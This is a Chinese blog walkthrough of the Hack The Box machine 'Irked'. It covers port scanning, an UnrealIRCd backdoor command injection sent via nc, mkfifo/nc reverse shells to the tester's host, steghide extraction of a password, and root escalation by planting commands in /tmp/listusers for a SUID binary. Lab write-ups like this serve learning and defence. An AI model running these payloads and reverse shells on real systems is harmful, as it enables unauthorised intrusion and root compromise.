• 【Hack The Box】linux练习-- Irked

    HTB 学习笔记

    Hack The Box】linux练习-- Irked

    🔥系列专栏:Hack The Box
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年11月17日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    文章目录

    在这里插入图片描述

    信息收集

    22/tcp    open     ssh           OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a5df5bdcf8378b675319bdc79c5fdad (DSA)
|   2048 752e66bfb93cccf77e848a8bf0810233 (RSA)
|   256 c8a3a25e349ac49b9053f750bfea253b (ECDSA)
|_  256 8d1b43c7d01a4c05cf82edc10163a20c (ED25519)
80/tcp    open     http          Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33304/tcp6  status
|   100024  1          41603/udp6  status
|   100024  1          42358/tcp   status
|_  100024  1          60786/udp   status
3172/tcp  filtered serverview-rm
6463/tcp  filtered unknown
6697/tcp  open     irc           UnrealIRCd
8067/tcp  open     irc           UnrealIRCd

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24

    在这里插入图片描述

    这个页面让我觉得irc有问题,并且nmap给我们展示了irc名字UnrealIRCd

    我在检查irc的同时开始对web页面进行目录爆破

    在这里插入图片描述
    结果是没有结果
    如果你没有安装irc客户端可以如下这么安装

    irc

    apt update && apt install -y hexchat

    • 1

    而后hexchat打开
    再首页面添加irked,而后再编辑它
    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    发现并没有频道

    我将搜索exp,发现如果我是3.2.8.1或者3.x我应该进行一些利用
    在这里插入图片描述
    但是我现在没有任何办法去获得版本信息
    我将分析一下这几个基于linux的exp,看看他们是如何利用的
    在这里插入图片描述看到payload
    尝试一下

    nc 10.129.16.135 6697
AB; ping -c 1 10.10.14.7
本机监听icmp流量
tcpdump -ni tun0 icmp

    • 1
    • 2
    • 3
    • 4

    在这里插入图片描述发现成功
    于是反弹端口

    AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.7 443 >/tmp/f

    • 1

    在这里插入图片描述
    我发现我看不到user.txt他是加密的
    于是我ls -la,发现了一个.backup

    Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

    • 1
    • 2

    steg隐写术分析

    在这里插入图片描述steg用下面的这个工具
    带着密码我们就可以提取图片内容

    steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss

    • 1
    extract- 我想提取数据
-sf irked.jpg- 提供要从中提取的文件
-p- 密码

    • 1
    • 2
    • 3

    在这里插入图片描述
    得到了密码就登陆

    ssh djmardov@10.129.16.135 

    • 1

    在这里插入图片描述查询可提权文件

    find / -perm -4000 -type f 2>/dev/null 

    • 1

    发现了一个从没见过的
    在这里插入图片描述我们直接执行看看他是干嘛的
    在这里插入图片描述

    提权思路

    说tmp下有个文件没找到,这应该就很明了了,因为他需要tmp下的文件执行,而我们对tmp完全可控,所以我们把命令写到/tmp/listusers即可
    /tmp/listusers: not found

    echo “test” > /tmp/listusers
    再执行viewuse发现listusers没有权限
    所以我们给他权限,因为他在tmp

    chmod +x  /tmp/listusers

    • 1

    echo “id” > /tmp/listusers
    再执行
    viewuse

    在这里插入图片描述

    echo "cat /root/root.txt" > /tmp/listusers

    • 1

    在这里插入图片描述
    我们获得了root.txt

    反弹个端口就行

    echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.7 8888 >/tmp/f" > /tmp/listusers

    • 1

    viewuser
    在这里插入图片描述

  • 相关阅读:
    配置oh my zsh的命令自动补全
    我的递归从不爆栈
    智慧燃气解决方案-最新全套文件
    微信视频号挂公众号文章链接新方法:不限次数,不限号
    java之static关键字
    ROS学习(26)动态参数配置
    Linux 下 JDK 安装(tar.gz版) - jdk8
    既不是研发顶尖高手,也不是销售大牛,为何偏偏获得 2 万 RMB 的首个涛思文化奖?
    火山引擎云原生存储加速实践
    CSDN21天学习挑战赛
  • 原文地址:https://blog.csdn.net/weixin_65527369/article/details/127925108